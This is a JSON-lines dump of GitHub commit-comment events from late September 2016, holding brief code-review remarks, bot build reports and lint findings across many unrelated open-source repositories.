{"id":"4635548452","type":"CommitCommentEvent","actor":{"login":"moniquemendy"},"repo":{"name":"ygopee/tp-2"},"payload":{"comment":{"id":19220066,"position":null,"line":null,"path":null,"commit_id":"7425d1595981398b53aadfd2c4435e8ce8692590","created_at":"2016-09-29T07:38:57Z","updated_at":"2016-09-29T07:38:57Z","body":"je ta'ai bien aider pour ce projet yohan memem pas tu mentionne\r\n"}},"created_at":"2016-09-29T07:38:57Z"}
{"id":"4635548699","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaArbTypes/ArbFloats.jl"},"payload":{"comment":{"id":19220068,"position":22,"line":14,"path":"test/runtests.jl","commit_id":"173e080e3b47c9f7b3392b05ddeeacc7698fd0d5","created_at":"2016-09-29T07:39:00Z","updated_at":"2016-09-29T07:39:00Z","body":"better off using `dirname(@__FILE__)` for this"}},"created_at":"2016-09-29T07:39:00Z"}
{"id":"4635550666","type":"CommitCommentEvent","actor":{"login":"radare"},"repo":{"name":"h4ng3r/radare2"},"payload":{"comment":{"id":19220070,"position":5,"line":173,"path":"libr/bin/format/objc/mach0_classes.c","commit_id":"9e7e5b7cca7dc4160a93c92dc1e3b47300bca14b","created_at":"2016-09-29T07:39:29Z","updated_at":"2016-09-29T07:39:29Z","body":"Wtf"}},"created_at":"2016-09-29T07:39:29Z"}
{"id":"4635551636","type":"CommitCommentEvent","actor":{"login":"GawainLynch"},"repo":{"name":"bolt/bolt"},"payload":{"comment":{"id":19220073,"position":null,"line":null,"path":null,"commit_id":"a79cd3509469fcdf52472ed0883c52b4117bda4f","created_at":"2016-09-29T07:39:43Z","updated_at":"2016-09-29T07:39:43Z","body":"OK… Seeing an immediate and fixable problem coming up … those old paths can be found/see via `dump()` and the generator deliberately doesn't work that way…\r\n\r\nWe just need to document (simply) the route binding that are available so that we avoid the problems with some of the other approaches people use because that's what they know, and what they can find written down … let's chat when you're post-coffee."}},"created_at":"2016-09-29T07:39:43Z"}
{"id":"4635551891","type":"CommitCommentEvent","actor":{"login":"radare"},"repo":{"name":"h4ng3r/radare2"},"payload":{"comment":{"id":19220075,"position":14,"line":186,"path":"libr/bin/format/objc/mach0_classes.c","commit_id":"9e7e5b7cca7dc4160a93c92dc1e3b47300bca14b","created_at":"2016-09-29T07:39:48Z","updated_at":"2016-09-29T07:39:48Z","body":"Missing ;"}},"created_at":"2016-09-29T07:39:48Z"}
{"id":"4635551962","type":"CommitCommentEvent","actor":{"login":"zhenyong"},"repo":{"name":"zhenyong/vue-router"},"payload":{"comment":{"id":19220076,"position":78,"line":78,"path":"docs/zh-cn/essentials/nested-routes.md","commit_id":"4616ab25e2b78206114bb473d10ac87b896215c5","created_at":"2016-09-29T07:39:49Z","updated_at":"2016-09-29T07:39:49Z","body":"=>多层"}},"created_at":"2016-09-29T07:39:49Z"}
{"id":"4635552787","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19220077,"position":5,"line":166,"path":"src/utils/intpoint.h","commit_id":"04dc8ac68b35c1fbd4ed4cd0c7ca5456bd132eb4","created_at":"2016-09-29T07:40:01Z","updated_at":"2016-09-29T07:40:01Z","body":"I'll consider it not blocking."}},"created_at":"2016-09-29T07:40:01Z"}
{"id":"4635552963","type":"CommitCommentEvent","actor":{"login":"radare"},"repo":{"name":"h4ng3r/radare2"},"payload":{"comment":{"id":19220078,"position":56,"line":497,"path":"libr/bin/format/objc/mach0_classes.c","commit_id":"9e7e5b7cca7dc4160a93c92dc1e3b47300bca14b","created_at":"2016-09-29T07:40:04Z","updated_at":"2016-09-29T07:40:04Z","body":"This is not python"}},"created_at":"2016-09-29T07:40:04Z"}
{"id":"4635554724","type":"CommitCommentEvent","actor":{"login":"cure16"},"repo":{"name":"cure16/hello-world"},"payload":{"comment":{"id":19220080,"position":null,"line":null,"path":null,"commit_id":"a18ed7b9723d8a7689d24ead4c85ccca22e241ec","created_at":"2016-09-29T07:40:30Z","updated_at":"2016-09-29T07:40:30Z","body":"this is my first project hello world"}},"created_at":"2016-09-29T07:40:30Z"}
{"id":"4635564758","type":"CommitCommentEvent","actor":{"login":"Hotell"},"repo":{"name":"vire/hlad-ui"},"payload":{"comment":{"id":19220090,"position":17,"line":18,"path":"tsconfig.json","commit_id":"92fd78c2ce78c52171706ceb70e90bf59474812f","created_at":"2016-09-29T07:42:58Z","updated_at":"2016-09-29T07:42:58Z","body":"hmm that's strange, mocha `describe` and `it` are also \"globals\" and there is no need to add them to `types`"}},"created_at":"2016-09-29T07:42:58Z"}
{"id":"4635565263","type":"CommitCommentEvent","actor":{"login":"GawainLynch"},"repo":{"name":"bolt/bolt"},"payload":{"comment":{"id":19220092,"position":null,"line":null,"path":null,"commit_id":"18d4ada6f5c97e8eb2c138d458ec2854fd99044a","created_at":"2016-09-29T07:43:04Z","updated_at":"2016-09-29T07:43:04Z","body":"Given we're cleaning up this trait to an almost respectable state, is it worth taking a few minutes to convert it to a proper trait? (abstracts, etc)"}},"created_at":"2016-09-29T07:43:04Z"}
{"id":"4635570379","type":"CommitCommentEvent","actor":{"login":"alexkulya"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19220097,"position":null,"line":null,"path":null,"commit_id":"da6951b1dc9fe639c32a814131a2e23c27e49066","created_at":"2016-09-29T07:44:18Z","updated_at":"2016-09-29T07:44:18Z","body":"Перевод не обязателен. Я из России. Переводить надо нашим друзьям - иностранцам :)"}},"created_at":"2016-09-29T07:44:18Z"}
{"id":"4635571584","type":"CommitCommentEvent","actor":{"login":"vire"},"repo":{"name":"vire/hlad-ui"},"payload":{"comment":{"id":19220098,"position":2,"line":4,"path":"tsconfig.json","commit_id":"92fd78c2ce78c52171706ceb70e90bf59474812f","created_at":"2016-09-29T07:44:35Z","updated_at":"2016-09-29T07:44:35Z","body":"¯\\_(ツ)_/¯\r\n\r\nThis is an important point when pulling TS to an existing project/devstack w/ `babel` that it's a bit pain + double transpilation kinda performance sub-optimal-ish. But you wanna have ES2015+ and next features parity. (If someone is seriously considering TS on redux like project with sagas, not having the option to use TS means a nogo)\r\n\r\nIn `hlad-ui` I plan to get rid of `babel`"}},"created_at":"2016-09-29T07:44:35Z"}
{"id":"4635574933","type":"CommitCommentEvent","actor":{"login":"malder1975"},"repo":{"name":"malder1975/vms-voznesenie"},"payload":{"comment":{"id":19220101,"position":null,"line":null,"path":null,"commit_id":"e690045f72c440493e69d9445921ea2201572e8d","created_at":"2016-09-29T07:45:21Z","updated_at":"2016-09-29T07:45:21Z","body":"sql dump"}},"created_at":"2016-09-29T07:45:21Z"}
{"id":"4635583123","type":"CommitCommentEvent","actor":{"login":"GawainLynch"},"repo":{"name":"bolt/bolt"},"payload":{"comment":{"id":19220108,"position":14,"line":56,"path":"src/Twig/Handler/ImageHandler.php","commit_id":"fb101327d8d076ac0ec08618c1cc623c298c64f9","created_at":"2016-09-29T07:47:19Z","updated_at":"2016-09-29T07:47:19Z","body":"This seals \"Matcher\" for me :+1: \r\n\r\nI still need to go over it, and `ToJson` but if anything this says the approach makes a lot of sense"}},"created_at":"2016-09-29T07:47:19Z"}
{"id":"4635583685","type":"CommitCommentEvent","actor":{"login":"joakimk"},"repo":{"name":"barsoom/gridlook"},"payload":{"comment":{"id":19220109,"position":6,"line":41,"path":"README.md","commit_id":"83fcf36c1b1aa5ea5331c3ac198e548cfc9bdb7b","created_at":"2016-09-29T07:47:28Z","updated_at":"2016-09-29T07:47:28Z","body":"Makes sense, added something to the readme."}},"created_at":"2016-09-29T07:47:28Z"}
{"id":"4635591003","type":"CommitCommentEvent","actor":{"login":"parmentf"},"repo":{"name":"Inist-CNRS/lodex"},"payload":{"comment":{"id":19220119,"position":null,"line":null,"path":null,"commit_id":"321030cd9dcfaf316ef4705070b32dca90e4f4b8","created_at":"2016-09-29T07:49:16Z","updated_at":"2016-09-29T07:49:16Z","body":"Tabulations ou pas tabulations?"}},"created_at":"2016-09-29T07:49:16Z"}
{"id":"4635591348","type":"CommitCommentEvent","actor":{"login":"vire"},"repo":{"name":"vire/hlad-ui"},"payload":{"comment":{"id":19220121,"position":17,"line":18,"path":"tsconfig.json","commit_id":"92fd78c2ce78c52171706ceb70e90bf59474812f","created_at":"2016-09-29T07:49:21Z","updated_at":"2016-09-29T07:49:21Z","body":"When I added \"mocha\" to types, I don't need to put the stub definitions into `global.d.ts`"}},"created_at":"2016-09-29T07:49:21Z"}
{"id":"4635592610","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19220124,"position":22,"line":33,"path":"src/utils/string.h","commit_id":"dce8a4629f811f850344acf5c322023633719761","created_at":"2016-09-29T07:49:39Z","updated_at":"2016-09-29T07:49:39Z","body":"I'll make the buffer 24 long. Note that allocating an array is constant time, so it doesn't have any impact."}},"created_at":"2016-09-29T07:49:39Z"}
{"id":"4635595190","type":"CommitCommentEvent","actor":{"login":"GawainLynch"},"repo":{"name":"bolt/bolt"},"payload":{"comment":{"id":19220128,"position":null,"line":null,"path":null,"commit_id":"9450521988a84b5f30af89255d98e7e9648a993a","created_at":"2016-09-29T07:50:14Z","updated_at":"2016-09-29T07:50:14Z","body":"Not sure I agree this is a sec. risk in the context is it used in … but `getJsonException()` is nonetheless the correct way to go forward!"}},"created_at":"2016-09-29T07:50:14Z"}
{"id":"4635597418","type":"CommitCommentEvent","actor":{"login":"GawainLynch"},"repo":{"name":"bolt/bolt"},"payload":{"comment":{"id":19220131,"position":null,"line":null,"path":null,"commit_id":"d4872182509e2d638fb7e7494390f36015fd5292","created_at":"2016-09-29T07:50:44Z","updated_at":"2016-09-29T07:50:44Z","body":":fire: :fire: :fire: :fire: :fire: "}},"created_at":"2016-09-29T07:50:44Z"}
{"id":"4635601998","type":"CommitCommentEvent","actor":{"login":"MorrisJobke"},"repo":{"name":"nextcloud/github_helper"},"payload":{"comment":{"id":19220136,"position":null,"line":null,"path":null,"commit_id":"d0f8fb6194566242a7563a90a93f5fe54b6ae195","created_at":"2016-09-29T07:51:51Z","updated_at":"2016-09-29T07:51:51Z","body":"@LukasReschke next time do it this way :wink: "}},"created_at":"2016-09-29T07:51:51Z"}
{"id":"4635604731","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19220140,"position":15,"line":55,"path":"src/utils/polygonUtils.cpp","commit_id":"433c90617e72cc5e56586fe8d7df9958e9b94c72","created_at":"2016-09-29T07:52:29Z","updated_at":"2016-09-29T07:52:29Z","body":"No, it's fine then."}},"created_at":"2016-09-29T07:52:29Z"}
{"id":"4635605897","type":"CommitCommentEvent","actor":{"login":"Hotell"},"repo":{"name":"vire/hlad-ui"},"payload":{"comment":{"id":19220144,"position":17,"line":18,"path":"tsconfig.json","commit_id":"92fd78c2ce78c52171706ceb70e90bf59474812f","created_at":"2016-09-29T07:52:47Z","updated_at":"2016-09-29T07:52:47Z","body":"why would you do that? you have definitions from `@types/mocha` why on earth putting something manually to `global.d.ts` ? :)"}},"created_at":"2016-09-29T07:52:47Z"}
{"id":"4635609111","type":"CommitCommentEvent","actor":{"login":"GHa2c"},"repo":{"name":"GHa2c/one"},"payload":{"comment":{"id":19220150,"position":null,"line":null,"path":null,"commit_id":"957d87ce3e1d16e8704a43e559fe54d3f6f1d378","created_at":"2016-09-29T07:53:30Z","updated_at":"2016-09-29T07:53:30Z","body":"This is my test."}},"created_at":"2016-09-29T07:53:30Z"}
{"id":"4635611384","type":"CommitCommentEvent","actor":{"login":"Forever-Young"},"repo":{"name":"Forever-Young/wait-for-it"},"payload":{"comment":{"id":19220158,"position":null,"line":null,"path":null,"commit_id":"f9aa0c10c9e82e9ef3c2b744c7fa5f80aac7901a","created_at":"2016-09-29T07:54:04Z","updated_at":"2016-09-29T07:54:04Z","body":"Doesn't properly handle strict mode with multiple hosts"}},"created_at":"2016-09-29T07:54:04Z"}
{"id":"4635612230","type":"CommitCommentEvent","actor":{"login":"FerdiAgrio"},"repo":{"name":"adrianbj/GetVideoThumbs"},"payload":{"comment":{"id":19220160,"position":null,"line":null,"path":null,"commit_id":"eca633c2f18967fe3f6fe96c99fab72ebb86fea0","created_at":"2016-09-29T07:54:16Z","updated_at":"2016-09-29T07:54:16Z","body":"Well, when researching further, this URL can't be accessed via YouTube. So please ignore the commit."}},"created_at":"2016-09-29T07:54:16Z"}
{"id":"4635616707","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19220164,"position":null,"line":null,"path":null,"commit_id":"d441d19e977d491f23ec5bc0611ecc10b027d16f","created_at":"2016-09-29T07:55:17Z","updated_at":"2016-09-29T07:55:17Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1064)"}},"created_at":"2016-09-29T07:55:17Z"}
{"id":"4635622883","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19220189,"position":22,"line":33,"path":"src/utils/string.h","commit_id":"dce8a4629f811f850344acf5c322023633719761","created_at":"2016-09-29T07:56:34Z","updated_at":"2016-09-29T07:56:34Z","body":"Note that that number in microns is 10 times the distance to the sun!\r\n16 characters can support 13 digits, a dot a minus sign and a null character, which makes it support up to 9999 km, which is generally more than enough..."}},"created_at":"2016-09-29T07:56:34Z"}
{"id":"4635625124","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19220194,"position":22,"line":33,"path":"src/utils/string.h","commit_id":"dce8a4629f811f850344acf5c322023633719761","created_at":"2016-09-29T07:57:05Z","updated_at":"2016-09-29T07:57:05Z","body":"renamed to char_count, good one"}},"created_at":"2016-09-29T07:57:05Z"}
{"id":"4635625550","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19220196,"position":23,"line":34,"path":"src/utils/string.h","commit_id":"dce8a4629f811f850344acf5c322023633719761","created_at":"2016-09-29T07:57:11Z","updated_at":"2016-09-29T07:57:11Z","body":"v"}},"created_at":"2016-09-29T07:57:11Z"}
{"id":"4635627035","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19220201,"position":22,"line":33,"path":"src/utils/string.h","commit_id":"dce8a4629f811f850344acf5c322023633719761","created_at":"2016-09-29T07:57:30Z","updated_at":"2016-09-29T07:57:30Z","body":"What if I want to make a galaxy printer? :disappointed: "}},"created_at":"2016-09-29T07:57:30Z"}
{"id":"4635628269","type":"CommitCommentEvent","actor":{"login":"srirambv"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19220202,"position":null,"line":null,"path":null,"commit_id":"509fbdb0bafaebd6c4531c4bb206b2b477340841","created_at":"2016-09-29T07:57:47Z","updated_at":"2016-09-29T07:57:47Z","body":"++ \r\nTested on the build(https://github.com/brave/browser-laptop/commit/509fbdb0bafaebd6c4531c4bb206b2b477340841). Doesn't redirect to mobile site. "}},"created_at":"2016-09-29T07:57:47Z"}
{"id":"4635628847","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19220206,"position":25,"line":36,"path":"src/utils/string.h","commit_id":"dce8a4629f811f850344acf5c322023633719761","created_at":"2016-09-29T07:57:54Z","updated_at":"2016-09-29T07:57:54Z","body":"yeah ok"}},"created_at":"2016-09-29T07:57:54Z"}
{"id":"4635632250","type":"CommitCommentEvent","actor":{"login":"cure16"},"repo":{"name":"cure16/hello-world"},"payload":{"comment":{"id":19220212,"position":null,"line":null,"path":null,"commit_id":"f104589c08825ca852821ddda0d418ac0b8a845d","created_at":"2016-09-29T07:58:42Z","updated_at":"2016-09-29T07:58:42Z","body":"ok"}},"created_at":"2016-09-29T07:58:42Z"}
{"id":"4635633948","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"Diman3589/triangle"},"payload":{"comment":{"id":19220219,"position":127,"line":126,"path":"Triangle/Triangle/Program.cs","commit_id":"9e895924f4471112a5c477f06084f3c22f2a6a83","created_at":"2016-09-29T07:59:07Z","updated_at":"2016-09-29T07:59:07Z","body":" А зачем создавать ссылку тогда? Дабл, как и ссылка на дабл, на x64 занимают по 8 байт"}},"created_at":"2016-09-29T07:59:07Z"}
{"id":"4635634327","type":"CommitCommentEvent","actor":{"login":"kisoo-han"},"repo":{"name":"kisoo-han/cubrid"},"payload":{"comment":{"id":19220222,"position":null,"line":null,"path":null,"commit_id":"5703348d5880aa1f2cb1a1eda4156c35576bfcbc","created_at":"2016-09-29T07:59:13Z","updated_at":"2016-09-29T07:59:13Z","body":"1. variable 'is_null' is changed to 'has_null'\r\n2. Add more comprehensive comments on it."}},"created_at":"2016-09-29T07:59:13Z"}
{"id":"4635634517","type":"CommitCommentEvent","actor":{"login":"cure16"},"repo":{"name":"cure16/hello-world"},"payload":{"comment":{"id":19220223,"position":null,"line":null,"path":null,"commit_id":"f104589c08825ca852821ddda0d418ac0b8a845d","created_at":"2016-09-29T07:59:16Z","updated_at":"2016-09-29T07:59:16Z","body":"why you do it"}},"created_at":"2016-09-29T07:59:16Z"}
{"id":"4635635545","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19220224,"position":62,"line":73,"path":"src/utils/string.h","commit_id":"dce8a4629f811f850344acf5c322023633719761","created_at":"2016-09-29T07:59:32Z","updated_at":"2016-09-29T07:59:32Z","body":"Not a problem any more now that the buffer is 24 long (and the longest int64_t is 19 digits and perhaps a minus sign)"}},"created_at":"2016-09-29T07:59:32Z"}
{"id":"4635638195","type":"CommitCommentEvent","actor":{"login":"vire"},"repo":{"name":"vire/hlad-ui"},"payload":{"comment":{"id":19220228,"position":17,"line":18,"path":"tsconfig.json","commit_id":"92fd78c2ce78c52171706ceb70e90bf59474812f","created_at":"2016-09-29T08:00:07Z","updated_at":"2016-09-29T08:00:07Z","body":"Having not `\"mocha\"` in types caueses \r\n![image](https://cloud.githubusercontent.com/assets/4021908/18945576/79cd9c96-862b-11e6-9da5-0a15b143152a.png)\r\n"}},"created_at":"2016-09-29T08:00:07Z"}
{"id":"4635640064","type":"CommitCommentEvent","actor":{"login":"scpeters"},"repo":{"name":"lvc/abi-compliance-checker"},"payload":{"comment":{"id":19220232,"position":48,"line":819,"path":"abi-compliance-checker.pl","commit_id":"26742a8c630e5dd42838a8c2faf4bb4f8e59c393","created_at":"2016-09-29T08:00:28Z","updated_at":"2016-09-29T08:00:28Z","body":"I am seeing syntax errors with this commit ([jenkins link](http://build.osrfoundation.org/job/gazebo-abichecker-any_to_any-xenial-amd64/88/console)):\r\n\r\n~~~\r\n+ abi-compliance-checker -lib gazebo -old pkg.xml -new devel.xml\r\nsyntax error at /usr/bin/abi-compliance-checker line 819, near \"\"\\n\\n\";\"\r\nExecution of /usr/bin/abi-compliance-checker aborted due to compilation errors.\r\n~~~\r\n\r\nI apologize that I don't know much about perl, so I don't know if this is a legitimate bug or just a version compatibility issue."}},"created_at":"2016-09-29T08:00:28Z"}
{"id":"4635648732","type":"CommitCommentEvent","actor":{"login":"watercups"},"repo":{"name":"watercups/Hello-World"},"payload":{"comment":{"id":19220241,"position":null,"line":null,"path":null,"commit_id":"05e8538429900a331990b93ee3d494347f2ed577","created_at":"2016-09-29T08:02:29Z","updated_at":"2016-09-29T08:02:29Z","body":"just prcactise"}},"created_at":"2016-09-29T08:02:29Z"}
{"id":"4635648912","type":"CommitCommentEvent","actor":{"login":"rrrene"},"repo":{"name":"rrrene/inch_ex"},"payload":{"comment":{"id":19220243,"position":27,"line":40,"path":"lib/inch_ex/reporter/remote.ex","commit_id":"81684ed22a404adea13e85105e2b3c5a4af3e463","created_at":"2016-09-29T08:02:31Z","updated_at":"2016-09-29T08:02:31Z","body":"I am honestly interested in clearing this up, but I'm sorry that I don't understand (yet; not a native speaker, so maybe I am literally misunderstanding something). \r\n\r\nIf you are on - say - Circle and run `mix inch.report` as part of your build, then InchEx should not start an evaluation (and make no request to Inch CI) if the build is part of a pull request. \r\n\r\nIf you regularly push to a branch on GitHub (e.g. the `develop` branch), which in turn triggers a build on Circle, then it should evaluate and send the results to the Inch CI service.\r\n\r\nIf you would want to only run `mix inch.report` on a certain branch, you can probably write a shell script which checks if `git rev-parse --abbrev-ref HEAD` is the singular branch you want to see reported.\r\n\r\nDoes that clear things up? Or did I take a wrong turn in my thinking?"}},"created_at":"2016-09-29T08:02:31Z"}
{"id":"4635650479","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"Diman3589/triangle"},"payload":{"comment":{"id":19220245,"position":25,"line":24,"path":"Triangle/Triangle/Program.cs","commit_id":"9e895924f4471112a5c477f06084f3c22f2a6a83","created_at":"2016-09-29T08:02:56Z","updated_at":"2016-09-29T08:02:56Z","body":"Значит реализуйте фабричный метод и опишите его плюсы по сравнению с тремя конструкторами и структурами для них"}},"created_at":"2016-09-29T08:02:56Z"}
{"id":"4635651908","type":"CommitCommentEvent","actor":{"login":"oleks"},"repo":{"name":"DIKU-EDU/kudos"},"payload":{"comment":{"id":19220247,"position":null,"line":null,"path":null,"commit_id":"388ced869472e731eec780830410a24ebf13ae7d","created_at":"2016-09-29T08:03:16Z","updated_at":"2016-09-29T08:03:16Z","body":"Philip Meulengracht? But see also #28 "}},"created_at":"2016-09-29T08:03:16Z"}
{"id":"4635653470","type":"CommitCommentEvent","actor":{"login":"oleks"},"repo":{"name":"DIKU-EDU/kudos"},"payload":{"comment":{"id":19220252,"position":null,"line":null,"path":null,"commit_id":"388ced869472e731eec780830410a24ebf13ae7d","created_at":"2016-09-29T08:03:39Z","updated_at":"2016-09-29T08:03:39Z","body":"Both were BSc projects."}},"created_at":"2016-09-29T08:03:39Z"}
{"id":"4635656153","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19220257,"position":null,"line":null,"path":null,"commit_id":"833794140c562a010327741c01f0aefeb09b3da8","created_at":"2016-09-29T08:04:16Z","updated_at":"2016-09-29T08:04:16Z","body":"develop (evanweaver) - Win64-Windows-7-VisualStudio-12: OK (2411 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-833794140c562a010327741c01f0aefeb09b3da8-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-833794140c562a010327741c01f0aefeb09b3da8-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.49%25-yellow.svg)</a> \n"}},"created_at":"2016-09-29T08:04:16Z"}
{"id":"4635659603","type":"CommitCommentEvent","actor":{"login":"liuxianfa520"},"repo":{"name":"liuxianfa520/learngit"},"payload":{"comment":{"id":19220265,"position":3,"line":3,"path":"readme.txt","commit_id":"bc4ac9c5babbc4fcf0d3aeb002958027471affd0","created_at":"2016-09-29T08:05:05Z","updated_at":"2016-09-29T08:05:05Z","body":"添加一行"}},"created_at":"2016-09-29T08:05:05Z"}
{"id":"4635666621","type":"CommitCommentEvent","actor":{"login":"luipir"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19220281,"position":18,"line":5274,"path":"src/providers/spatialite/qgsspatialiteprovider.cpp","commit_id":"137a667dc2b623e51df1b4927c23cda67e298957","created_at":"2016-09-29T08:06:40Z","updated_at":"2016-09-29T08:06:40Z","body":"received.. thank you"}},"created_at":"2016-09-29T08:06:40Z"}
{"id":"4635669235","type":"CommitCommentEvent","actor":{"login":"Miwrzezl"},"repo":{"name":"TheSharks/WildBeast"},"payload":{"comment":{"id":19220290,"position":null,"line":null,"path":null,"commit_id":"264f42a75b2a6cd10fea510a609d19431a37dfaf","created_at":"2016-09-29T08:07:20Z","updated_at":"2016-09-29T08:07:20Z","body":"when* not on fml"}},"created_at":"2016-09-29T08:07:20Z"}
{"id":"4635679251","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/prde"},"payload":{"comment":{"id":19220310,"position":null,"line":null,"path":null,"commit_id":"4c9d4379cac5e4446cbade7f55167ac6076f1471","created_at":"2016-09-29T08:09:41Z","updated_at":"2016-09-29T08:09:41Z","body":"[R/do_magic.R:6:1:](https://github.com/richelbilderbeek/prde/blob/4c9d4379cac5e4446cbade7f55167ac6076f1471/R/do_magic.R#L6) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​{\n^\n```\n[R/do_magic.R:10:7:](https://github.com/richelbilderbeek/prde/blob/4c9d4379cac5e4446cbade7f55167ac6076f1471/R/do_magic.R#L10) *style:* **Use <-, not =, for assignment.**\n```r\n​  out = x * 2;\n      ^\n```\n[R/do_magic.R:11:7:](https://github.com/richelbilderbeek/prde/blob/4c9d4379cac5e4446cbade7f55167ac6076f1471/R/do_magic.R#L11) *style:* **Use <-, not =, for assignment.**\n```r\n​  out = replace(out, out == 84, 42);\n      ^\n```"}},"created_at":"2016-09-29T08:09:41Z"}
{"id":"4635679646","type":"CommitCommentEvent","actor":{"login":"Hotell"},"repo":{"name":"vire/hlad-ui"},"payload":{"comment":{"id":19220313,"position":2,"line":4,"path":"tsconfig.json","commit_id":"92fd78c2ce78c52171706ceb70e90bf59474812f","created_at":"2016-09-29T08:09:47Z","updated_at":"2016-09-29T08:09:47Z","body":"of course, but don't blame TS, TS is producing exports/imports as per spec. Babel is culprit here"}},"created_at":"2016-09-29T08:09:47Z"}
{"id":"4635680138","type":"CommitCommentEvent","actor":{"login":"LWTechGaming"},"repo":{"name":"TheSharks/WildBeast"},"payload":{"comment":{"id":19220315,"position":null,"line":null,"path":null,"commit_id":"264f42a75b2a6cd10fea510a609d19431a37dfaf","created_at":"2016-09-29T08:09:53Z","updated_at":"2016-09-29T08:09:53Z","body":"Just nobody pull the Git now, k?"}},"created_at":"2016-09-29T08:09:53Z"}
{"id":"4635682586","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19220321,"position":null,"line":null,"path":null,"commit_id":"84ecb88651dad3abd5c9450b4fdcd6ac2cb53431","created_at":"2016-09-29T08:10:26Z","updated_at":"2016-09-29T08:10:26Z","body":"We should test it again in all the different cases before releasing.\r\nhttps://github.com/LimeSurvey/LimeSurvey/blob/master/application/helpers/qanda_helper.php#L3057-L3071"}},"created_at":"2016-09-29T08:10:26Z"}
{"id":"4635685906","type":"CommitCommentEvent","actor":{"login":"aitjcize"},"repo":{"name":"aitjcize/QCamber"},"payload":{"comment":{"id":19220331,"position":null,"line":null,"path":null,"commit_id":"7aa7265c8708e66e5374a71389bace9d1b5a51c6","created_at":"2016-09-29T08:11:13Z","updated_at":"2016-09-29T08:11:13Z","body":"It's generate by the bison program according to the grammar file."}},"created_at":"2016-09-29T08:11:13Z"}
{"id":"4635686463","type":"CommitCommentEvent","actor":{"login":"thenightex"},"repo":{"name":"TheSharks/WildBeast"},"payload":{"comment":{"id":19220332,"position":null,"line":null,"path":null,"commit_id":"264f42a75b2a6cd10fea510a609d19431a37dfaf","created_at":"2016-09-29T08:11:21Z","updated_at":"2016-09-29T08:11:21Z","body":"Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaand it's pulled"}},"created_at":"2016-09-29T08:11:21Z"}
{"id":"4635690292","type":"CommitCommentEvent","actor":{"login":"LWTechGaming"},"repo":{"name":"TheSharks/WildBeast"},"payload":{"comment":{"id":19220339,"position":null,"line":null,"path":null,"commit_id":"264f42a75b2a6cd10fea510a609d19431a37dfaf","created_at":"2016-09-29T08:12:15Z","updated_at":"2016-09-29T08:12:15Z","body":"You done did it, @thenightex."}},"created_at":"2016-09-29T08:12:15Z"}
{"id":"4635690827","type":"CommitCommentEvent","actor":{"login":"boryas"},"repo":{"name":"boryas/hcppd"},"payload":{"comment":{"id":19220340,"position":null,"line":null,"path":null,"commit_id":"a55ae1e2de6c25942ea11a0c13df7341b8578666","created_at":"2016-09-29T08:12:23Z","updated_at":"2016-09-29T08:12:23Z","body":"#16 "}},"created_at":"2016-09-29T08:12:23Z"}
{"id":"4635692884","type":"CommitCommentEvent","actor":{"login":"rrrene"},"repo":{"name":"rrrene/inch_ex"},"payload":{"comment":{"id":19220344,"position":27,"line":40,"path":"lib/inch_ex/reporter/remote.ex","commit_id":"81684ed22a404adea13e85105e2b3c5a4af3e463","created_at":"2016-09-29T08:12:52Z","updated_at":"2016-09-29T08:12:52Z","body":"**I think I understood your point after all.** Sorry for the confusion. :disappointed: \r\n\r\nPlease create an issue so we can discuss this in a more public setting where others can contribute to the discussion as well. I'd like to way the pro's and con's before implementing such a switch, but I am not deeply opposed to it either :+1:"}},"created_at":"2016-09-29T08:12:52Z"}
{"id":"4635696937","type":"CommitCommentEvent","actor":{"login":"jvdzwaan"},"repo":{"name":"andi-nl/ANDI-frontend"},"payload":{"comment":{"id":19220353,"position":null,"line":null,"path":null,"commit_id":"6ec318a4e22c326ed64fc3513343a91fe0f294a1","created_at":"2016-09-29T08:13:47Z","updated_at":"2016-09-29T08:13:47Z","body":"Fixes #139"}},"created_at":"2016-09-29T08:13:47Z"}
